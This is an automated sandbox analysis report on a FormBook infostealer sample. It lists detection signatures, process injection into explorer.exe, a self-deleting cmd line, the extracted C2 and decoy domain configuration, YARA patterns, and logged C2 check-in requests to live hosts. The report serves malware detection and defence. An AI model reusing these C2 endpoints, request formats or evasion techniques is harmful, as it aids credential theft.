Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hj3YCvtlg7.exe

Overview

General Information

Sample name:hj3YCvtlg7.exe
renamed because original name is a hash value
Original sample name:4850a766fab45d5947075658d9c6bbf4b970f0d05b082c1472b93d9a7fa3d093.exe
Analysis ID:1422327
MD5:dad6e1001c72b68d690fedf88254f157
SHA1:8304a2d91515ca2f1079f787de0b8a776941c2cd
SHA256:4850a766fab45d5947075658d9c6bbf4b970f0d05b082c1472b93d9a7fa3d093
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Reads the DNS cache
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • hj3YCvtlg7.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\hj3YCvtlg7.exe" MD5: DAD6E1001C72B68D690FEDF88254F157)
    • hj3YCvtlg7.exe (PID: 7816 cmdline: "C:\Users\user\Desktop\hj3YCvtlg7.exe" MD5: DAD6E1001C72B68D690FEDF88254F157)
    • hj3YCvtlg7.exe (PID: 7824 cmdline: "C:\Users\user\Desktop\hj3YCvtlg7.exe" MD5: DAD6E1001C72B68D690FEDF88254F157)
    • hj3YCvtlg7.exe (PID: 7832 cmdline: "C:\Users\user\Desktop\hj3YCvtlg7.exe" MD5: DAD6E1001C72B68D690FEDF88254F157)
      • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • ipconfig.exe (PID: 7884 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
          • cmd.exe (PID: 7964 cmdline: /c del "C:\Users\user\Desktop\hj3YCvtlg7.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.yoursweets.online/vr01/"], "decoy": ["eclipsefoodservice.com", "oregonjobs.co", "ethicai.pro", "frontierconnects.co", "elcaporalburley.com", "exoticskinco.com", "topdeals.biz", "carmensbookstore.com", "mayorii.com", "viewhird.com", "bharatcrimecontrol24news.com", "sampleshubusa.com", "molobeverello.com", "nicholsonflooringservices.com", "kidscircle.shop", "771010.cc", "poseidoncrm.com", "liviafiorelli.com", "flavorfog.online", "xaqh.info", "bombslot-42.co", "floatshop.store", "massagechairspecialists.com", "mks-digital.net", "wti395.vip", "entelnegocio.com", "ansemgram.com", "owletbaby.shop", "skyhut.io", "kakevpn.com", "protectmichildren.net", "gratiasempirellc.com", "hsyxkj.com", "kirtirefrigeration.com", "makeyousurprise.com", "qqixe.shop", "svshop.us", "yesxoit.xyz", "jupitr-claim.top", "laneflowlogistics.com", "brandonbirk.com", "vjll.net", "maturak-na-klic.online", "mingshengglass.com", "theshopsatmaunalani.com", "accidentapp.online", "fertnow.com", "nicolbauer.com", "mym-agency.com", "efxprm.com", "studioenginedemo.com", "erabits.com", "chhpiyg.pro", "adadripdropz.com", "dropperdeals.com", "viphao200.com", "lasik-eye-surgery-45089.bond", "helyibudapest.com", "michellecaldwelldesign.com", "snugandkind.com", "redirect2-userweb.com", "pataltarghya.com", "tumi123ans.lol", "familyofficesheet.com"]}
SourceRuleDescriptionAuthorStrings
00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 24 entries
      SourceRuleDescriptionAuthorStrings
      5.2.hj3YCvtlg7.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.hj3YCvtlg7.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.hj3YCvtlg7.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          5.2.hj3YCvtlg7.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.hj3YCvtlg7.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18849:$sqlite3step: 68 34 1C 7B E1
          • 0x1895c:$sqlite3step: 68 34 1C 7B E1
          • 0x18878:$sqlite3text: 68 38 2A 90 C5
          • 0x1899d:$sqlite3text: 68 38 2A 90 C5
          • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries
          No Sigma rule has matched
          Timestamp:04/08/24-15:23:24.247871
          SID:2031412
          Source Port:49718
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/08/24-15:25:48.239107
          SID:2031412
          Source Port:49722
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/08/24-15:26:08.604254
          SID:2031412
          Source Port:49723
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/08/24-15:25:06.359757
          SID:2031412
          Source Port:49721
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/08/24-15:23:02.817331
          SID:2031412
          Source Port:49716
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/08/24-15:24:04.974063
          SID:2031412
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/08/24-15:24:45.933979
          SID:2031412
          Source Port:49720
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://www.yoursweets.onlineAvira URL Cloud: Label: malware
          Source: www.yoursweets.online/vr01/Avira URL Cloud: Label: malware
          Source: http://www.jupitr-claim.top/vr01/www.nicolbauer.comAvira URL Cloud: Label: malware
          Source: http://www.jupitr-claim.topAvira URL Cloud: Label: malware
          Source: http://www.jupitr-claim.top/vr01/Avira URL Cloud: Label: malware
          Source: http://www.yoursweets.online/vr01/www.ethicai.proAvira URL Cloud: Label: malware
          Source: http://www.yoursweets.online/vr01/Avira URL Cloud: Label: malware
          Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.yoursweets.online/vr01/"], "decoy": ["eclipsefoodservice.com", "oregonjobs.co", "ethicai.pro", "frontierconnects.co", "elcaporalburley.com", "exoticskinco.com", "topdeals.biz", "carmensbookstore.com", "mayorii.com", "viewhird.com", "bharatcrimecontrol24news.com", "sampleshubusa.com", "molobeverello.com", "nicholsonflooringservices.com", "kidscircle.shop", "771010.cc", "poseidoncrm.com", "liviafiorelli.com", "flavorfog.online", "xaqh.info", "bombslot-42.co", "floatshop.store", "massagechairspecialists.com", "mks-digital.net", "wti395.vip", "entelnegocio.com", "ansemgram.com", "owletbaby.shop", "skyhut.io", "kakevpn.com", "protectmichildren.net", "gratiasempirellc.com", "hsyxkj.com", "kirtirefrigeration.com", "makeyousurprise.com", "qqixe.shop", "svshop.us", "yesxoit.xyz", "jupitr-claim.top", "laneflowlogistics.com", "brandonbirk.com", "vjll.net", "maturak-na-klic.online", "mingshengglass.com", "theshopsatmaunalani.com", "accidentapp.online", "fertnow.com", "nicolbauer.com", "mym-agency.com", "efxprm.com", "studioenginedemo.com", "erabits.com", "chhpiyg.pro", "adadripdropz.com", "dropperdeals.com", "viphao200.com", "lasik-eye-surgery-45089.bond", "helyibudapest.com", "michellecaldwelldesign.com", "snugandkind.com", "redirect2-userweb.com", "pataltarghya.com", "tumi123ans.lol", "familyofficesheet.com"]}
          Source: hj3YCvtlg7.exeReversingLabs: Detection: 68%
          Source: hj3YCvtlg7.exeVirustotal: Detection: 71%Perma Link
          Source: Yara matchFile source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: hj3YCvtlg7.exeJoe Sandbox ML: detected
          Source: hj3YCvtlg7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: hj3YCvtlg7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: ipconfig.pdb source: hj3YCvtlg7.exe, 00000005.00000002.1405267878.0000000001298000.00000004.00000020.00020000.00000000.sdmp, hj3YCvtlg7.exe, 00000005.00000002.1405192974.0000000001270000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: hj3YCvtlg7.exe, 00000005.00000002.1405267878.0000000001298000.00000004.00000020.00020000.00000000.sdmp, hj3YCvtlg7.exe, 00000005.00000002.1405192974.0000000001270000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: UuoN.pdbSHA256 source: hj3YCvtlg7.exe
          Source: Binary string: wntdll.pdbUGP source: hj3YCvtlg7.exe, 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1406723918.0000000000971000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1404652357.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: hj3YCvtlg7.exe, hj3YCvtlg7.exe, 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1406723918.0000000000971000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1404652357.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: UuoN.pdb source: hj3YCvtlg7.exe

          Networking

          barindex
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49716 -> 13.248.169.48:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49718 -> 104.21.56.10:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49719 -> 102.134.40.151:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49720 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49721 -> 13.248.169.48:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49722 -> 66.147.240.91:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49723 -> 172.67.154.171:80
          Source: Malware configuration extractorURLs: www.yoursweets.online/vr01/
          Source: global trafficHTTP traffic detected: GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=PLKcE8xpvhyOzOxKkeL/+DL1kNIcq39IIYnP8OO3XXjl6ci5rXmACxw/pz+4M+mlciA/ HTTP/1.1Host: www.kidscircle.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?uTm4=CRIcXgDta+9JTffevem10+yBm+uKfejT3UejFVr1Q2sKU73ve+2FIZL4fAb3NdJYnMZe&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.bombslot-42.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?uTm4=p/xcNqzHhW+jsc+DeauMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRzL3IBjum3b&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.mingshengglass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?uTm4=md7YwaIYFUjajARP8H7AA5qkzU4U6St+AjWqtcGBvmy8i5h4BhyP/cD7LiVxVrOxyfa+&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.ethicai.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=om+RAj8+1U0Z4Q5rkk8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuS9IxznZs+QL HTTP/1.1Host: www.owletbaby.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=wFZ5enF1tq9XrqHWNXhfStMJiblJh5bHmGRWjDpakqkf/10aPf5zMfbio2tqs2yXyxpi HTTP/1.1Host: www.oregonjobs.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?uTm4=4lP9+b8r1hHYuPjiih6w+ijrcjXpUPjRDd99FwKlJ6rbETvBe77stQ4feUetoD8uHBUT&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.helyibudapest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
          Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: sun-asnSC sun-asnSC
          Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 6_2_0FDA6F82 getaddrinfo,setsockopt,recv,6_2_0FDA6F82
          Source: global trafficHTTP traffic detected: GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=PLKcE8xpvhyOzOxKkeL/+DL1kNIcq39IIYnP8OO3XXjl6ci5rXmACxw/pz+4M+mlciA/ HTTP/1.1Host: www.kidscircle.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?uTm4=CRIcXgDta+9JTffevem10+yBm+uKfejT3UejFVr1Q2sKU73ve+2FIZL4fAb3NdJYnMZe&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.bombslot-42.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?uTm4=p/xcNqzHhW+jsc+DeauMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRzL3IBjum3b&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.mingshengglass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?uTm4=md7YwaIYFUjajARP8H7AA5qkzU4U6St+AjWqtcGBvmy8i5h4BhyP/cD7LiVxVrOxyfa+&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.ethicai.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=om+RAj8+1U0Z4Q5rkk8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuS9IxznZs+QL HTTP/1.1Host: www.owletbaby.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=wFZ5enF1tq9XrqHWNXhfStMJiblJh5bHmGRWjDpakqkf/10aPf5zMfbio2tqs2yXyxpi HTTP/1.1Host: www.oregonjobs.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?uTm4=4lP9+b8r1hHYuPjiih6w+ijrcjXpUPjRDd99FwKlJ6rbETvBe77stQ4feUetoD8uHBUT&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.helyibudapest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.kidscircle.shop
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Apr 2024 13:23:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sj4kR%2FWxTqizZeKzuOtgPoR4qc%2B9UsS9LTHntpDXGYTM7Cf0swEcQjz%2Bf2zU0AMtmKZwgXJYXOfOZdLKBnp6XNrdXPfiUV2l9vKbqirlHETdLc4yuJcepmISOk%2BwVr13SUhP8u8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8712925ce9d2a534-MIAalt-svc: h3=":443"; ma=86400Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: a2<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Apr 2024 13:25:48 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000006.00000000.1359952336.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: hj3YCvtlg7.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: hj3YCvtlg7.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
          Source: explorer.exe, 00000006.00000000.1359952336.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000006.00000000.1359952336.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: hj3YCvtlg7.exeString found in binary or memory: http://ocsp.comodoca.com0
          Source: explorer.exe, 00000006.00000000.1359952336.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
